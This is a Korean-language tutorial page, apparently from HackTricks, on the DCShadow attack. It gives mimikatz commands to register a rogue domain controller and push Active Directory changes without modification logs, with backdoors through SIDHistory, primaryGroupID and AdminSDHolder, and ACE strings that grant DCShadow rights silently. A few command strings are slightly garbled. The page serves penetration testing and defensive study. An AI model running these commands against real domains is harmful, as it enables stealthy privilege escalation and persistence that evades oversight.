{{#include ../../banners/hacktricks-training.md}} # DCShadow AD에 **새 도메인 컨트롤러**를 등록하고 이를 사용하여 지정된 객체에 **속성**(SIDHistory, SPNs...)을 **푸시**합니다. 이 과정에서 **수정**에 대한 **로그**가 남지 않습니다. **DA** 권한이 필요하며 **루트 도메인** 내에 있어야 합니다.\ 잘못된 데이터를 사용하면 꽤 끔찍한 로그가 나타날 수 있습니다. 공격을 수행하려면 2개의 mimikatz 인스턴스가 필요합니다. 그 중 하나는 SYSTEM 권한으로 RPC 서버를 시작하며(여기서 수행할 변경 사항을 지정해야 함), 다른 인스턴스는 값을 푸시하는 데 사용됩니다: ```bash:mimikatz1 (RPC servers) !+ !processtoken lsadump::dcshadow /object:username /attribute:Description /value="My new description" ``` ```bash:mimikatz2 (push) - Needs DA or similar lsadump::dcshadow /push ``` **`elevate::token`**는 `mimikatz1` 세션에서 작동하지 않으며, 이는 스레드의 권한을 상승시키지만 **프로세스의 권한**을 상승시켜야 합니다.\ 또한 "LDAP" 객체를 선택할 수 있습니다: `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local` DA 또는 최소한의 권한을 가진 사용자로부터 변경 사항을 푸시할 수 있습니다: - **도메인 객체**에서: - _DS-Install-Replica_ (도메인에서 복제본 추가/제거) - _DS-Replication-Manage-Topology_ (복제 토폴로지 관리) - _DS-Replication-Synchronize_ (복제 동기화) - **구성 컨테이너**의 **사이트 객체**(및 그 자식): - _CreateChild and DeleteChild_ - **DC로 등록된 컴퓨터의 객체**: - _WriteProperty_ (Not Write) - **대상 객체**: - _WriteProperty_ (Not Write) [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1)를 사용하여 비권한 사용자에게 이러한 권한을 부여할 수 있습니다(이로 인해 일부 로그가 남습니다). 이는 DA 권한을 갖는 것보다 훨씬 더 제한적입니다.\ 예를 들어: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` 이는 _**mcorp-student1**_ 머신에 로그인한 사용자 이름 _**student1**_이 객체 _**root1user**_에 대해 DCShadow 권한을 갖는다는 것을 의미합니다. ## DCShadow를 사용하여 백도어 생성하기 ```bash:Set Enterprise Admins in SIDHistory to a user lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519 ``` ```bash:Chage PrimaryGroupID (put user as member of Domain Administrators) lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519 ``` ```bash:Modify ntSecurityDescriptor of AdminSDHolder (give Full Control to a user) #First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519 (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl #Second, add to the ACE permissions to your user and push it using DCShadow lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value: ``` ## Shadowception - DCShadow를 사용하여 DCShadow 권한 부여 (수정된 권한 로그 없음) 다음 ACE를 사용자 SID로 끝에 추가해야 합니다: - 도메인 객체에서: - `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)` - `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)` - `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)` - 공격자 컴퓨터 객체에서: `(A;;WP;;;UserSID)` - 대상 사용자 객체에서: `(A;;WP;;;UserSID)` - 구성 컨테이너의 사이트 객체에서: `(A;CI;CCDC;;;UserSID)` 객체의 현재 ACE를 가져오려면: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl` 이 경우 **여러 변경을** 해야 하므로, **mimikatz1 세션** (RPC 서버)에서 변경하려는 각 변경에 대해 **`/stack`** 매개변수를 사용해야 합니다. 이렇게 하면, 모든 스택된 변경을 수행하기 위해 **`/push`**를 한 번만 사용하면 됩니다. [**DCShadow에 대한 더 많은 정보는 ired.team에서 확인하세요.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow) {{#include ../../banners/hacktricks-training.md}}